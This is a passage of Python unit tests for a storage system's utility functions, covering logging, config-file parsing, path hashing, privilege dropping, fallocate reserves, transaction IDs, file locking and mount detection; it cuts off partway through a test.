self.assert_('12345' not in log_msg)
# test txn already in message
self.assertEquals(logger.txn_id, '12345')
logger.warn('test 12345 test')
self.assertEquals(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assert_('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('client_ip' in log_msg)
self.assert_('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('client_ip' not in log_msg)
self.assert_('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.warn('test 1.2.3.4 test 12345')
self.assertEquals(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_storage_directory(self):
self.assertEquals(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_whataremyips(self):
myips = utils.whataremyips()
self.assert_(len(myips) > 1)
self.assert_('127.0.0.1' in myips)
def test_hash_path(self):
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
# Yes, these tests are deliberately very fragile. We want to make sure
# that if someones changes the results hash_path produces, they know it
try:
self.assertEquals(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEquals(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEquals(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
finally:
utils.HASH_PATH_PREFIX = _prefix
def test_load_libc_function(self):
self.assert_(callable(
utils.load_libc_function('printf')))
self.assert_(callable(
utils.load_libc_function('some_not_real_function')))
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
with open('/tmp/test', 'wb') as f:
f.write(conf)
make_filename = lambda: '/tmp/test'
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEquals(result, expected)
self.assertRaises(SystemExit, utils.readconf, '/tmp/test', 'section3')
os.unlink('/tmp/test')
self.assertRaises(SystemExit, utils.readconf, '/tmp/test')
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
with open('/tmp/test', 'wb') as f:
f.write(conf)
make_filename = lambda: '/tmp/test'
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEquals(result, expected)
os.unlink('/tmp/test')
self.assertRaises(SystemExit, utils.readconf, '/tmp/test')
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEquals(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEquals(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
import pwd
self.assertEquals(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds)
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, [])
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assert_(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
reset_loggers()
finally:
utils.sys = _orig_sys
utils.os = _orig_os
def test_get_logger_console(self):
reset_loggers()
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assert_(console_handlers)
# make sure you can't have two console handlers
self.assertEquals(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEquals(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEquals(new_handler, old_handler)
reset_loggers()
def test_ratelimit_sleep(self):
running_time = 0
start = time.time()
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.assertTrue(abs((time.time() - start) * 100) < 1)
running_time = 0
start = time.time()
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(25 - (time.time() - start) * 100) < 10)
def test_ratelimit_sleep_with_incr(self):
running_time = 0
start = time.time()
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 250 (with no -1)
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertTrue(abs(50 - (time.time() - start) * 100) < 10)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEquals(parsed.scheme, 'http')
self.assertEquals(parsed.hostname, '127.0.0.1')
self.assertEquals(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEquals(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEquals(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEquals(parsed.hostname, '::1')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEquals(parsed.hostname, '')
def test_ratelimit_sleep_with_sleep(self):
running_time = 0
start = time.time()
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(100 - (time.time() - start) * 100) < 10)
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEquals(len(asdf), 1)
self.assertEquals(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEquals(len(app_bins), 2)
self.assertEquals(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEquals(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEquals(len(sub_ini), 1)
self.assertEquals(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt'
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEquals(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assert_(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
    # With dir_ext set, search_tree() returns matching *directories*
    # (the N.conf.d dirs) rather than the files inside them.
    files = (
        'object-server/object-server.conf-base',
        'object-server/1.conf.d/base.conf',
        'object-server/1.conf.d/1.conf',
        'object-server/2.conf.d/base.conf',
        'object-server/2.conf.d/2.conf',
        'object-server/3.conf.d/base.conf',
        'object-server/3.conf.d/3.conf',
        'object-server/4.conf.d/base.conf',
        'object-server/4.conf.d/4.conf',
    )
    with temptree(files) as t:
        conf_dirs = utils.search_tree(t, 'object-server', '.conf',
                                      dir_ext='conf.d')
    self.assertEquals(len(conf_dirs), 4)
    for i in range(4):
        conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
        self.assert_(conf_dir in conf_dirs)
def test_write_file(self):
    # utils.write_file() creates the file, creates missing parent
    # dirs, but refuses to write "through" an existing regular file.
    with temptree([]) as t:
        file_name = os.path.join(t, 'test')
        utils.write_file(file_name, 'test')
        with open(file_name, 'r') as f:
            contents = f.read()
        self.assertEquals(contents, 'test')
        # and also subdirs
        file_name = os.path.join(t, 'subdir/test2')
        utils.write_file(file_name, 'test2')
        with open(file_name, 'r') as f:
            contents = f.read()
        self.assertEquals(contents, 'test2')
        # but can't over-write files
        file_name = os.path.join(t, 'subdir/test2/test3')
        self.assertRaises(IOError, utils.write_file, file_name,
                          'test3')
def test_remove_file(self):
    # utils.remove_file() is best-effort: returns None whether or not
    # the file exists, and never raises for a missing path.
    with temptree([]) as t:
        file_name = os.path.join(t, 'blah.pid')
        # assert no raise
        self.assertEquals(os.path.exists(file_name), False)
        self.assertEquals(utils.remove_file(file_name), None)
        with open(file_name, 'w') as f:
            f.write('1')
        self.assert_(os.path.exists(file_name))
        self.assertEquals(utils.remove_file(file_name), None)
        self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
    # Binary (1024-based) suffixes with rounding at the half-unit
    # boundary (1535 -> 1Ki, 1536 -> 2Ki); values beyond Yi saturate.
    self.assertEquals(utils.human_readable(0), '0')
    self.assertEquals(utils.human_readable(1), '1')
    self.assertEquals(utils.human_readable(10), '10')
    self.assertEquals(utils.human_readable(100), '100')
    self.assertEquals(utils.human_readable(999), '999')
    self.assertEquals(utils.human_readable(1024), '1Ki')
    self.assertEquals(utils.human_readable(1535), '1Ki')
    self.assertEquals(utils.human_readable(1536), '2Ki')
    self.assertEquals(utils.human_readable(1047552), '1023Ki')
    self.assertEquals(utils.human_readable(1048063), '1023Ki')
    self.assertEquals(utils.human_readable(1048064), '1Mi')
    self.assertEquals(utils.human_readable(1048576), '1Mi')
    self.assertEquals(utils.human_readable(1073741824), '1Gi')
    self.assertEquals(utils.human_readable(1099511627776), '1Ti')
    self.assertEquals(utils.human_readable(1125899906842624), '1Pi')
    self.assertEquals(utils.human_readable(1152921504606846976), '1Ei')
    self.assertEquals(utils.human_readable(1180591620717411303424), '1Zi')
    self.assertEquals(utils.human_readable(1208925819614629174706176),
                      '1Yi')
    self.assertEquals(utils.human_readable(1237940039285380274899124224),
                      '1024Yi')
def test_validate_sync_to(self):
for goodurl in ('http://1.1.1.1/v1/a/c/o',
'http://1.1.1.1:8080/a/c/o',
'http://2.2.2.2/a/c/o',
'https://1.1.1.1/v1/a/c/o',
''):
self.assertEquals(utils.validate_sync_to(goodurl,
['1.1.1.1', '2.2.2.2']),
None)
for badurl in ('http://1.1.1.1',
'httpq://1.1.1.1/v1/a/c/o',
'http://1.1.1.1/v1/a/c/o?query',
'http://1.1.1.1/v1/a/c/o#frag',
'http://1.1.1.1/v1/a/c/o?query#frag',
'http://1.1.1.1/v1/a/c/o?query=param',
'http://1.1.1.1/v1/a/c/o?query=param#frag',
'http://1.1.1.2/v1/a/c/o'):
self.assertNotEquals(
utils.validate_sync_to(badurl, ['1.1.1.1', '2.2.2.2']),
None)
def test_TRUE_VALUES(self):
    # Every entry in TRUE_VALUES must already be lowercase, since
    # config_true_value() lowercases its input before comparing.
    for v in utils.TRUE_VALUES:
        self.assertEquals(v, v.lower())
def test_config_true_value(self):
    # Patch TRUE_VALUES to prove config_true_value() is driven by it
    # (case-insensitively) and passes booleans straight through.
    orig_trues = utils.TRUE_VALUES
    try:
        utils.TRUE_VALUES = 'hello world'.split()
        for val in 'hello world HELLO WORLD'.split():
            self.assertTrue(utils.config_true_value(val) is True)
        self.assertTrue(utils.config_true_value(True) is True)
        self.assertTrue(utils.config_true_value('foo') is False)
        self.assertTrue(utils.config_true_value(False) is False)
    finally:
        utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
    # Table-driven: expected may be either an int result or an
    # exception class (ValueError for unparseable input).
    expectations = {
        # (value, default) : expected,
        ('1', 0): 1,
        (1, 0): 1,
        ('asdf', 0): ValueError,
        ('auto', 1): 1,   # 'auto' (any case) means "use the default"
        ('AutO', 1): 1,
        ('Aut0', 1): ValueError,
        (None, 1): 1,
    }
    for (value, default), expected in expectations.items():
        try:
            rv = utils.config_auto_int_value(value, default)
        except Exception, e:
            # only swallow the exception the table predicted
            if e.__class__ is not expected:
                raise
        else:
            self.assertEquals(expected, rv)
def test_streq_const_time(self):
    # Constant-time string comparison: equal, different length, and
    # same-length-different-case must behave like ==.
    self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
    self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
    self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_quorum_size(self):
    # quorum_size(n) is a strict majority: n // 2 + 1.
    expected_sizes = {1: 1,
                      2: 2,
                      3: 2,
                      4: 3,
                      5: 3}
    got_sizes = dict([(n, utils.quorum_size(n)) for n in expected_sizes])
    self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
    # IPv4 addresses pass through rsync_ip() unmodified.
    self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
    # IPv6 addresses get bracketed for rsync's host:port syntax.
    self.assertEqual(
        utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
        '[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
    # IPv4-mapped IPv6 addresses count as IPv6 and get brackets too.
    self.assertEqual(
        utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_fallocate_reserve(self):
    # FallocateWrapper(noop=True) skips the real syscall but still
    # enforces FALLOCATE_RESERVE; os.fstatvfs is stubbed so "free
    # space" (f_frsize * f_bavail) is fully under test control.
    # The wrapper must fail when free - requested_size <= reserve.
    class StatVFS(object):
        # mutable class attrs let each scenario tweak free space
        f_frsize = 1024
        f_bavail = 1

    def fstatvfs(fd):
        return StatVFS()

    orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
    orig_fstatvfs = utils.os.fstatvfs
    try:
        fallocate = utils.FallocateWrapper(noop=True)
        utils.os.fstatvfs = fstatvfs
        # Want 1023 reserved, have 1024 * 1 free, so succeeds
        utils.FALLOCATE_RESERVE = 1023
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
        # Want 1023 reserved, have 512 * 2 free, so succeeds
        utils.FALLOCATE_RESERVE = 1023
        StatVFS.f_frsize = 512
        StatVFS.f_bavail = 2
        self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
        # Want 1024 reserved, have 1024 * 1 free, so fails
        utils.FALLOCATE_RESERVE = 1024
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError, err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
        # Want 1024 reserved, have 512 * 2 free, so fails
        utils.FALLOCATE_RESERVE = 1024
        StatVFS.f_frsize = 512
        StatVFS.f_bavail = 2
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError, err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
        # Want 2048 reserved, have 1024 * 1 free, so fails
        utils.FALLOCATE_RESERVE = 2048
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError, err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
        # Want 2048 reserved, have 512 * 2 free, so fails
        utils.FALLOCATE_RESERVE = 2048
        StatVFS.f_frsize = 512
        StatVFS.f_bavail = 2
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError, err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
        # Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
        # fails
        utils.FALLOCATE_RESERVE = 1023
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(1))
        except OSError, err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
        # Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
        # succeeds
        utils.FALLOCATE_RESERVE = 1022
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
        # Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
        # succeeds
        utils.FALLOCATE_RESERVE = 1023
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
        # Want 1024 reserved, have 1024 * 1 free, and even though
        # file size is 0, since we're under the reserve, fails
        utils.FALLOCATE_RESERVE = 1024
        StatVFS.f_frsize = 1024
        StatVFS.f_bavail = 1
        exc = None
        try:
            fallocate(0, 1, 0, ctypes.c_uint64(0))
        except OSError, err:
            exc = err
        self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
    finally:
        # always restore the module-level reserve and the real fstatvfs
        utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
        utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
    # Stub _sys_fallocate to capture its args; fallocate() must always
    # invoke it (even for 0 or negative sizes, clamped to 0) with
    # (fd, mode=1, offset=0, length).
    class FallocateWrapper(object):

        def __init__(self):
            self.last_call = None

        def __call__(self, *args):
            self.last_call = list(args)
            # unwrap the ctypes value so the test can compare ints
            self.last_call[-1] = self.last_call[-1].value
            return 0

    orig__sys_fallocate = utils._sys_fallocate
    try:
        utils._sys_fallocate = FallocateWrapper()
        # Ensure fallocate calls _sys_fallocate even with 0 bytes
        utils._sys_fallocate.last_call = None
        utils.fallocate(1234, 0)
        self.assertEquals(utils._sys_fallocate.last_call,
                          [1234, 1, 0, 0])
        # Ensure fallocate calls _sys_fallocate even with negative bytes
        utils._sys_fallocate.last_call = None
        utils.fallocate(1234, -5678)
        self.assertEquals(utils._sys_fallocate.last_call,
                          [1234, 1, 0, 0])
        # Ensure fallocate calls _sys_fallocate properly with positive
        # bytes
        utils._sys_fallocate.last_call = None
        utils.fallocate(1234, 1)
        self.assertEquals(utils._sys_fallocate.last_call,
                          [1234, 1, 0, 1])
        utils._sys_fallocate.last_call = None
        utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
        self.assertEquals(utils._sys_fallocate.last_call,
                          [1234, 1, 0, 10 * 1024 * 1024 * 1024])
    finally:
        utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
    # Layout: 'tx' + 21 random hex chars + '-' + 10-hex-digit
    # timestamp + optional suffix; time is frozen to make the
    # timestamp field deterministic.
    fake_time = 1366428370.5163341
    with patch.object(utils.time, 'time', return_value=fake_time):
        trans_id = utils.generate_trans_id('')
        self.assertEquals(len(trans_id), 34)
        self.assertEquals(trans_id[:2], 'tx')
        self.assertEquals(trans_id[23], '-')
        self.assertEquals(int(trans_id[24:], 16), int(fake_time))
    with patch.object(utils.time, 'time', return_value=fake_time):
        trans_id = utils.generate_trans_id('-suffix')
        self.assertEquals(len(trans_id), 41)
        self.assertEquals(trans_id[:2], 'tx')
        self.assertEquals(trans_id[34:], '-suffix')
        self.assertEquals(trans_id[23], '-')
        self.assertEquals(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
    # get_trans_id_time() extracts the embedded epoch timestamp, or
    # returns None for old-format / malformed transaction ids.
    ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
    self.assertEquals(ts, None)
    ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
    self.assertEquals(ts, 1366428678)
    self.assertEquals(
        time.asctime(time.gmtime(ts)) + ' UTC',
        'Sat Apr 20 03:31:18 2013 UTC')
    # a trailing suffix must not confuse the parser
    ts = utils.get_trans_id_time(
        'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
    self.assertEquals(ts, 1366428678)
    self.assertEquals(
        time.asctime(time.gmtime(ts)) + ' UTC',
        'Sat Apr 20 03:31:18 2013 UTC')
    ts = utils.get_trans_id_time('')
    self.assertEquals(ts, None)
    ts = utils.get_trans_id_time('garbage')
    self.assertEquals(ts, None)
    ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
    self.assertEquals(ts, None)
def test_tpool_reraise(self):
    # tpool.execute is stubbed to run the callable inline; results
    # pass through, and both Exception and BaseException re-raise.
    with patch.object(utils.tpool, 'execute', lambda f: f()):
        self.assertTrue(
            utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
        self.assertRaises(Exception,
            utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
        self.assertRaises(BaseException,
            utils.tpool_reraise,
            MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
    # lock_file() takes an exclusive flock; while held, a second
    # non-blocking flock must fail with IOError.  Also covers
    # append mode, timeout (LockTimeout), and unlink-on-exit.
    flags = os.O_CREAT | os.O_RDWR
    with NamedTemporaryFile(delete=False) as nt:
        nt.write("test string")
        nt.flush()
        nt.close()
        with utils.lock_file(nt.name, unlink=False) as f:
            self.assertEqual(f.read(), "test string")
            # we have a lock, now let's try to get a newer one
            fd = os.open(nt.name, flags)
            self.assertRaises(IOError, fcntl.flock, fd,
                              fcntl.LOCK_EX | fcntl.LOCK_NB)
        with utils.lock_file(nt.name, unlink=False, append=True) as f:
            self.assertEqual(f.read(), "test string")
            f.seek(0)
            f.write("\nanother string")
            f.flush()
            f.seek(0)
            self.assertEqual(f.read(), "test string\nanother string")
            # we have a lock, now let's try to get a newer one
            fd = os.open(nt.name, flags)
            self.assertRaises(IOError, fcntl.flock, fd,
                              fcntl.LOCK_EX | fcntl.LOCK_NB)
        with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
            try:
                with utils.lock_file(nt.name, timeout=1, unlink=False) as f:
                    self.assertTrue(False, "Expected LockTimeout exception")
            except LockTimeout:
                pass
        with utils.lock_file(nt.name, unlink=True) as f:
            self.assertEqual(f.read(), "test string\nanother string")
            # we have a lock, now let's try to get a newer one
            fd = os.open(nt.name, flags)
            self.assertRaises(IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
        # unlink=True removed the file on exit, so remove must fail
        self.assertRaises(OSError, os.remove, nt.name)
def test_ismount_path_does_not_exist(self):
    # A nonexistent path is simply "not a mount", no exception.
    tmpdir = mkdtemp()
    try:
        assert utils.ismount(os.path.join(tmpdir, 'bar')) is False
    finally:
        shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
    # A plain temp directory is not a mount point.
    tmpdir = mkdtemp()
    try:
        assert utils.ismount(tmpdir) is False
    finally:
        shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
    # A non-ENOENT lstat error (EACCES here) on the path itself must
    # propagate out of ismount() rather than be swallowed.
    def _mock_os_lstat(path):
        raise OSError(13, "foo")

    tmpdir = mkdtemp()
    try:
        with patch("os.lstat", _mock_os_lstat):
            try:
                utils.ismount(tmpdir)
            except OSError:
                pass
            else:
                self.fail("Expected OSError")
    finally:
        shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
    # A symlink is never treated as a mount point, even if its
    # target is one.
    tmpdir = mkdtemp()
    try:
        link = os.path.join(tmpdir, "tmp")
        os.symlink("/tmp", link)
        assert utils.ismount(link) is False
    finally:
        shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
    # '/' is always a mount point.
    assert utils.ismount('/') is True
def test_ismount_parent_path_error(self):
    # lstat failing on the parent ('..') must also propagate.
    _os_lstat = os.lstat

    def _mock_os_lstat(path):
        # fail only for the parent-directory lookup
        if path.endswith(".."):
            raise OSError(13, "foo")
        else:
            return _os_lstat(path)

    tmpdir = mkdtemp()
    try:
        with patch("os.lstat", _mock_os_lstat):
            try:
                utils.ismount(tmpdir)
            except OSError:
                pass
            else:
                self.fail("Expected OSError")
    finally:
        shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
    # Fake the parent having a different st_dev than the child: that
    # is the "crossed a device boundary" case and ismount() must
    # handle it without raising.
    _os_lstat = os.lstat

    class MockStat(object):
        def __init__(self, mode, dev, ino):
            self.st_mode = mode
            self.st_dev = dev
            self.st_ino = ino

    def _mock_os_lstat(path):
        if path.endswith(".."):
            parent = _os_lstat(path)
            # bump the parent's device id so it differs from the child
            return MockStat(parent.st_mode, parent.st_dev + 1,
                            parent.st_ino)
        else:
            return _os_lstat(path)

    tmpdir = mkdtemp()
    try:
        with patch("os.lstat", _mock_os_lstat):
            try:
                utils.ismount(tmpdir)
            except OSError:
                self.fail("Unexpected exception")
            else:
                pass
    finally:
        shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
    # Fabricate child stat values so the inode-based branch of
    # ismount() is exercised without raising.
    _os_lstat = os.lstat

